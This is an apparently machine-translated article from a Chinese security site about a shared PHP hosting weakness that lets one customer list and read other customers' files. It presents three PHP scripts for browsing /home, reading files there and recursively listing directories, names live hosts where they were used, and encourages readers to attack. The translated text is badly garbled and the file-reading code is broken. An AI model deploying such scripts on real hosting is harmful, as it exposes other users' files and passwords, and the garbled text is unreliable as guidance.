PHP collects fees small leak of the space
Most (can carry out PHP) collect fees the space has this problem
It is with Hu Yi below exemple:
Code:
< ?
$d=dir("/home");Echo "Handle:" . $d->handle. "≪br>n";Echo "Path:" . $d->path. "≪br>n";While($entry=$d->read() )
{Echo $entry. "≪br>n";
}
$d->close();
? >
Use this Test.php program to be able to be examined / all files below Home, can examine all user of the current leader of 51.net
What to change "/home" into "/" to you can see? Yourself goes looking. Fasten too nervous. It is nervous from the back
Below HOME is to land an account completely
HOME/.domain and
HOME/.trialdomain
Those who fall is 3 grade domain name completely
There is a lot of to do not have a space in the account, it is spacing. I tried repeatedly.
3 grade domain name is corresponding · A fictitious lead plane
Example (dare not use Hu Yi)Http://tonylong.l1h.net/test.phpHttp://tonylong.l1h.net/test1.phpHttp://tonylong.l1h.net/test2.phpHttp://tonylong.l1h.net/test3.php
Read with Aa.php take a file to be piled up formerly
Read take. .
< ?
$fd=fopen("/home/* . *" , "R");While($buffer=fgets($fd, 4096) )
{Echo $buffer;
}Fclose($fd);
? >
Example is read take: / the former code of Home/html/phpmyadmin/user_password.php (this is very big to website menace) Http://tonylong.l1h.net/aa.php
With Ss.php inquiry appoints all files below file directory and folder
< ? Function Listdir($dir){Echo "<ul>";
$handle=opendir($dir);Echo "directory Handle:$Handle<br>n";While ($sdir=readdir($handle)){If(is_file("$dir/$sdir") )Echo "<li>$dir/$sdir";If(is_dir("$dir/$sdir") And $sdir<>' . ' And $sdir<>' . . '){Echo "<li>$dir";Listdir("$dir/$sdir");
}
}Closedir($handle);Echo "</ul>";
}
If(! Empty($dir)){Listdir($dir);
}
? >
<form Action="test.php" Method=post>
Input inquiry method please: <input Type=text Name=dir Size=50>
Inquiry of <input Type=submit Value=" ">
</form>
Example Http://tonylong.l1h.net/ss.php
Show the free space that the space is L1h.net in order to perform
Everybody fastens attack
Still have the one cycle that Perlhack makes up.
Anyway the tiger ala account that myself found me and password.
Hot Concern
- Windows2000 system flaw is sol
- Inbreak detect term is contact
- Be aimed at ACCESS flaw anothe
- SQL infuse flaw is contacted c
- SQL infuse flaw is contacted c
- Inbreak testing system princip
- Inbreak testing system princip
- SQL infuse flaw is contacted c
- Analyse IDS to inbreak testing
- Inbreak detect term is contact
- Dynamical article uploads this
- New virus code treats the defe
- Pry " super bodyguard " fatal
- PHP collects fees small leak o
- Hacker of new SP2 flaw switchs
Random Recommendation
- Inbreak detect term is contact
- Dynamical article uploads this
- New virus code treats the defe
- Inbreak testing system princip
- Inbreak testing system princip
- Hacker of new SP2 flaw switchs
- Inbreak testing system princip
- SQL infuse flaw is contacted c
- Be aimed at ACCESS flaw anothe
- Analyse IDS to inbreak testing
Position:中国防火墙网>Vulnerability patch>
PHP collects fees small leak of the space
From; Author:Stand originally